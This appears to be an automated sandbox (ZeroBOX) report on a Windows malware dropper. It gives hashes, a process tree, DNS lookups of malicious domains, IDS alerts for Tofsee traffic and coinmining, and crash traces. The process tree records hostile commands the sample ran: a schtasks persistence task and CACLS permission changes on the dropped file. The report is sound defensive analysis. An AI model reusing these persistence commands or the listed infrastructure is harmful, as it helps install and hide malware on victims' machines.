Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 19, 2023, 7:47 a.m.	Oct. 19, 2023, 7:55 a.m.

Size	1.1MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`191febed315d7c3a620b564e99e5f3cc`
SHA256	`be598baeed48aa13f42daed457b938ba19ee75c081a3571c582815822df7121a`
CRC32	`C8E8586E`
ssdeep	`24576:A4G/xo8crC7yRjvOwKS87o9ugbalGaRlnMMS:A4Gu8hyRjvKH7o8gbKbS`
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description)

Random.exe "C:\Users\test22\AppData\Local\Temp\Random.exe"
840
- InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2060
  - NsAOOuuxBVI141vT8Ty9RGNr.exe "C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe"
    2304
    - cmd.exe cmd /c hime.bat
      2436
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        2148
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2148 CREDAT:145409
        2844
    - himeffectively.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe
      2372
      - untilmathematicspro.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\untilmathematicspro.exe
        2600
        
        untilmathematics.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
        2788
  - XHChe4TMuyQgPR4OrdooBhRa.exe "C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe"
    2296
    - nhdues.exe "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
      2400
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
        2576
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
        2736
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2948
        
        cacls.exe CACLS "nhdues.exe" /P "test22:N"
        2132
        
        cacls.exe CACLS "nhdues.exe" /P "test22:R" /E
        2532
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2752
        
        cacls.exe CACLS "..\1ff8bec27e" /P "test22:N"
        2928
        
        cacls.exe CACLS "..\1ff8bec27e" /P "test22:R" /E
        536
  - 1Dn33rKCA4dC8aXmng0BVypp.exe "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe"
    2456
    - 1Dn33rKCA4dC8aXmng0BVypp.exe "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe"
      3060
  - jsj9BnxQe1wUSt4fq4fFdIbl.exe "C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe"
    2640
  - 2v4fymhYYNWC2FFg5XXDybVC.exe "C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe"
    2696
  - vtmaPKRXAfqpNkKfnPwslgoN.exe "C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe"
    2888
  - DhJlbLqN6jQFakonmgEZ33Ks.exe "C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe"
    3016
  - tLqJinIq9eTQIYLlq5LobLYm.exe "C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe" --silent --allusers=0
    2164

Name	Response	Post-Analysis Lookup
yip.su	A 148.251.234.93	148.251.234.93
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.68.143
galandskiyher5.com	A 194.169.175.127	194.169.175.127
flyawayaero.net	A 172.67.216.81 A 104.21.93.225	172.67.216.81
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.209.95.50
gons01b.top	A 85.143.220.63	85.143.220.63
martvl.com	A 69.48.143.183	69.48.143.183
laubenstein.space	A 45.130.41.101	45.130.41.101
iplogger.com	A 148.251.234.93	148.251.234.93
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	131.153.76.130
diplodoka.net	A 104.21.78.56 A 172.67.217.52	104.21.78.56
net.geo.opera.com	A 107.167.110.211 A 107.167.110.216 CNAME lati.lb.opera.technology CNAME us.net.opera.com	107.167.110.216
lycheepanel.info	A 104.21.32.208 A 172.67.187.122	104.21.32.208
grabyourpizza.com	A 104.21.90.82 A 172.67.197.174	104.21.90.82
potatogoose.com	A 104.21.35.235 A 172.67.180.173	172.67.180.173

IP Address	Status	Action
104.194.128.170	Active	Moloch
104.20.67.143	Active	Moloch
104.21.32.208	Active	Moloch
104.21.35.235	Active	Moloch
104.21.78.56	Active	Moloch
107.167.110.211	Active	Moloch
117.18.232.200	Active	Moloch
121.254.136.9	Active	Moloch
131.153.76.130	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
172.67.197.174	Active	Moloch
172.67.216.81	Active	Moloch
172.86.97.117	Active	Moloch
193.42.32.29	Active	Moloch
194.169.175.127	Active	Moloch
45.130.41.101	Active	Moloch
69.48.143.183	Active	Moloch
85.143.220.63	Active	Moloch
85.217.144.143	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 148.251.234.93:443 -> 192.168.56.103:49165	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 148.251.234.93:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 104.21.32.208:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 172.86.97.117:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 172.86.97.117:80 -> 192.168.56.103:49166	2014819	ET INFO Packed Executable Download	Misc activity
TCP 69.48.143.183:443 -> 192.168.56.103:49174	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 69.48.143.183:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.86.97.117:80 -> 192.168.56.103:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 172.86.97.117:80 -> 192.168.56.103:49166	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 172.86.97.117:80 -> 192.168.56.103:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.20.67.143:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 172.67.216.81:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49171 -> 172.67.197.174:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49179 -> 104.21.78.56:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 85.217.144.143:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 85.217.144.143:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49169	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49176 -> 45.130.41.101:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49168 -> 85.217.144.143:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 104.21.35.235:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 85.217.144.143:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49169	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.103:49168	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49168	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 85.143.220.63:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 85.143.220.63:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 85.143.220.63:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 194.169.175.127:80 -> 192.168.56.103:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.169.175.127:80 -> 192.168.56.103:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 107.167.110.211:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 85.143.220.63:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.143.220.63:80 -> 192.168.56.103:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.143.220.63:80 -> 192.168.56.103:49173	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 148.251.234.93:443 -> 192.168.56.103:49217	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
UDP 192.168.56.103:60141 -> 164.124.101.2:53	2047719	ET INFO External IP Lookup Domain (iplogger .com in DNS lookup)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49212 -> 148.251.234.93:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49212 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49216 -> 148.251.234.93:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49216 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 148.251.234.93:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49215 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:65119 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.103:49213 -> 148.251.234.93:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49213 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49170 104.21.32.208:443	C=US, O=Let's Encrypt, CN=E1	CN=lycheepanel.info	9f:29:fd:d3:0f:46:b4:fc:1f:d0:06:c7:4e:4d:21:d0:21:08:ea:43
TLS 1.2 192.168.56.103:49164 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2 192.168.56.103:49167 172.67.216.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=flyawayaero.net	34:8b:a3:9d:94:c4:8d:02:5c:e1:f1:43:da:57:49:64:a9:1c:b6:fe
TLS 1.2 192.168.56.103:49171 172.67.197.174:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.grabyourpizza.com	19:34:3f:f1:b2:75:20:7f:8a:58:d1:fd:26:b2:74:e2:ea:f8:76:e6
TLS 1.2 192.168.56.103:49179 104.21.78.56:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=diplodoka.net	08:f2:0c:9e:cc:84:cd:91:24:54:d5:fe:5e:3f:a9:46:68:a2:58:33
TLS 1.2 192.168.56.103:49176 45.130.41.101:443	C=US, O=Let's Encrypt, CN=R3	CN=laubenstein.space	d4:04:82:56:eb:8d:bb:fd:72:7a:36:fd:90:c1:07:aa:45:ac:92:27
TLS 1.2 192.168.56.103:49178 104.21.35.235:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=potatogoose.com	0f:a9:ea:9d:3e:af:d2:24:68:a0:8f:b7:58:00:c9:0b:f0:7f:31:37
TLS 1.2 192.168.56.103:49180 107.167.110.211:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com	8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af
TLS 1.3 192.168.56.103:49232 131.153.76.130:80	None	None	None

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 19, 2023, 7:47 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 19, 2023, 7:47 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 7:47 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 7:47 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 7:47 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 7:47 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 19, 2023, 7:47 a.m.	buffer: SUCCESS: The scheduled task "nhdues.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2023, 7:47 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 19, 2023, 7:47 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 19, 2023, 7:47 a.m.	buffer: r console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 19, 2023, 7:47 a.m.		1	1	0

One or more processes crashed (5 events)

Time & API	Arguments	Status
__exception__ Oct. 19, 2023, 7:48 a.m.	stacktrace: GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18 MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x746a77b7 MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15 MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57 tlqjiniq9etqiyllq5loblym+0x1a2e @ 0xef1a2e tlqjiniq9etqiyllq5loblym+0x22e8 @ 0xef22e8 tlqjiniq9etqiyllq5loblym+0xed98 @ 0xefed98 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x704f3f46 registers.esp: 1372356 registers.edi: 0 registers.eax: 1884241734 registers.ebp: 1372396 registers.edx: 0 registers.ebx: 0 registers.esi: 1884241734 registers.ecx: 7540072	1
__exception__ Oct. 19, 2023, 7:48 a.m.	stacktrace: GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18 MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x746a77b7 MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15 MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57 tlqjiniq9etqiyllq5loblym+0x1a2e @ 0xef1a2e tlqjiniq9etqiyllq5loblym+0x22e8 @ 0xef22e8 tlqjiniq9etqiyllq5loblym+0xed98 @ 0xefed98 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x704f3f46 registers.esp: 1372356 registers.edi: 0 registers.eax: 1884241734 registers.ebp: 1372396 registers.edx: 0 registers.ebx: 0 registers.esi: 1884241734 registers.ecx: 7540072	1
__exception__ Oct. 19, 2023, 7:48 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25 tlqjiniq9etqiyllq5loblym+0x1b6fb @ 0xf0b6fb tlqjiniq9etqiyllq5loblym+0x1b78d @ 0xf0b78d tlqjiniq9etqiyllq5loblym+0x1b5c2 @ 0xf0b5c2 tlqjiniq9etqiyllq5loblym+0xee13 @ 0xefee13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x750d3ef4 registers.esp: 1373364 registers.edi: 0 registers.eax: 5951968 registers.ebp: 1373392 registers.edx: 1 registers.ebx: 0 registers.esi: 3787600 registers.ecx: 1884108156	1
__exception__ Oct. 19, 2023, 7:49 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 